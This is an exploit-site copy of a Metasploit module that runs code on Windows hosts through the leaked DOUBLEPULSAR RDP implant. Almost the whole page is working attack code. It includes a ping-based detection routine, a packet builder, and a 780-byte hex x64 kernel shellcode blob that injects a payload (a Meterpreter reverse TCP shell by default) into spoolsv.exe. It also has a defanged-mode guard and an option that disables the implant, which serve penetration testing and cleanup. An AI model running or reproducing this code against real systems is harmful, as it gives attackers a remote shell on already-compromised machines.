RDP DOUBLEPULSAR Remote Code Execution

2020.02.05
Credit: Luke Jennings
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::RDP MAX_SHELLCODE_SIZE = 4096 def initialize(info = {}) super(update_info(info, 'Name' => 'RDP DOUBLEPULSAR Remote Code Execution', 'Description' => %q{ This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for RDP. While this module primarily performs code execution against the implant, the "Neutralize implant" target allows you to disable the implant. }, 'Author' => [ 'Equation Group', # DOUBLEPULSAR implant 'Shadow Brokers', # Equation Group dump 'Luke Jennings', # DOPU analysis and detection 'wvu', # RDP DOPU analysis and module 'Tom Sellers', # RDP DOPU analysis 'Spencer McIntyre' # RDP DOPU analysis ], 'References' => [ ['URL', 'https://github.com/countercept/doublepulsar-detection-script'] ], 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X64, 'Privileged' => true, 'Payload' => { 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size, 'DisableNops' => true }, 'Targets' => [ ['Execute payload (x64)', 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } ], ['Neutralize implant', 'DefaultOptions' => { 'PAYLOAD' => nil # XXX: "Unset" generic payload } ] ], 'DefaultTarget' => 0, 'Notes' => { 'AKA' => ['DOUBLEPULSAR'], 'RelatedModules' => ['exploit/windows/smb/smb_doublepulsar_rce'], 'Stability' => [CRASH_OS_DOWN], 'Reliability' => [REPEATABLE_SESSION] } )) register_advanced_options([ OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]), OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe']) ]) end OPCODES = { exec: 0x01, ping: 0x02, burn: 0x03 }.freeze DOUBLEPULSAR_MAGIC = 0x19283744 # https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_osversioninfoexw def parse_doublepulsar_ping(res) return unless res && res.length == 288 magic, _size, major, minor, build = res.unpack('V5') sp_major, _sp_minor, _suites, prod, arch = res[-8..-1].unpack('v3C2') return unless magic == DOUBLEPULSAR_MAGIC ver_str = "#{major}.#{minor}.#{build}" sp_str = "SP#{sp_major}" prod_str = case prod when 1 'Workstation' when 2 'Domain Controller' when 3 'Server' end arch_str = case arch when 1 'x86' when 2 'x64' end "Windows #{prod_str} #{ver_str} #{sp_str} #{arch_str}" end def setup super rdp_connect is_rdp, server_selected_protocol = rdp_check_protocol fail_with(Failure::BadConfig, 'Target port is not RDP') unless is_rdp case server_selected_protocol when RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX fail_with(Failure::BadConfig, 'DOUBLEPULSAR does not support NLA') when RDPConstants::PROTOCOL_SSL vprint_status('Swapping plain socket to SSL') swap_sock_plain_to_ssl end rescue Rex::ConnectionError, RdpCommunicationError => e fail_with(Failure::Disconnected, e.message) end def cleanup rdp_disconnect super end def check print_status('Sending ping to DOUBLEPULSAR') res = do_rdp_doublepulsar_pkt(OPCODES[:ping]) unless (info = parse_doublepulsar_ping(res)) print_error('DOUBLEPULSAR not detected or disabled') return CheckCode::Safe end print_warning('DOUBLEPULSAR RDP IMPLANT DETECTED!!!') print_good("Target is #{info}") CheckCode::Vulnerable end def exploit if datastore['DefangedMode'] warning = <<~EOF Are you SURE you want to execute code against a nation-state implant? You MAY contaminate forensic evidence if there is an investigation. Disable the DefangedMode option if you have authorization to proceed. EOF fail_with(Failure::BadConfig, warning) end # No ForceExploit because check is accurate unless check == CheckCode::Vulnerable fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR') end case target.name when 'Execute payload (x64)' print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}") shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName']) shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length) vprint_status("Total shellcode length: #{shellcode.length} bytes") print_status('Sending shellcode to DOUBLEPULSAR') res = do_rdp_doublepulsar_pkt(OPCODES[:exec], shellcode) when 'Neutralize implant' return neutralize_implant end if res fail_with(Failure::UnexpectedReply, 'Unexpected response from implant') end print_good('Payload execution successful') end def neutralize_implant print_status('Neutralizing DOUBLEPULSAR') res = do_rdp_doublepulsar_pkt(OPCODES[:burn]) if res fail_with(Failure::UnexpectedReply, 'Unexpected response from implant') end print_good('Implant neutralization successful') end def do_rdp_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil) rdp_send_recv(make_rdp_mcs_doublepulsar(opcode, body)) rescue Errno::ECONNRESET, RdpCommunicationError nil end =begin MULTIPOINT-COMMUNICATION-SERVICE T.125 DomainMCSPDU: channelJoinConfirm (15) channelJoinConfirm result: rt-domain-not-hierarchical (2) initiator: 14120 requested: 6402 =end def make_rdp_mcs_doublepulsar(opcode, body) data = "\x3c" # channelJoinConfirm data << [DOUBLEPULSAR_MAGIC].pack('V') data << [opcode].pack('v') if body data << [body.length, body.length, 0].pack('V*') data << body end build_data_tpdu(data) end # ring3 = user mode encoded payload # proc_name = process to inject APC into def make_kernel_user_payload(ring3, proc_name) sc = make_kernel_shellcode(proc_name) sc << [ring3.length].pack('S<') sc << ring3 sc end def generate_process_hash(process) # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm proc_hash = 0 process << "\x00" process.each_byte do |c| proc_hash = ror(proc_hash, 13) proc_hash += c end [proc_hash].pack('l<') end def ror(dword, bits) (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF end def make_kernel_shellcode(proc_name) # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm # Length: 780 bytes "\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" \ "\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" \ "\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" \ "\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" \ "\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" \ "\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" \ "\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" \ "\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" \ "\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" \ "\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" \ "\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" \ "\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" \ "\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" + generate_process_hash(proc_name.upcase) + "\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" \ "\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" \ "\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" \ "\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" \ "\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" \ "\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" \ "\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" \ "\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" \ "\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" \ "\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" \ "\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" \ "\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" \ "\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" \ "\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" \ "\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" \ "\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" \ "\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" \ "\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" \ "\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" \ "\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" \ "\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" \ "\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" \ "\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \ "\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" \ "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" \ "\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" \ "\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" \ "\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" \ "\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" \ "\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" \ "\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" \ "\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" \ "\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" \ "\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" \ "\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" \ "\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3" end def kernel_shellcode_size make_kernel_shellcode('').length end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top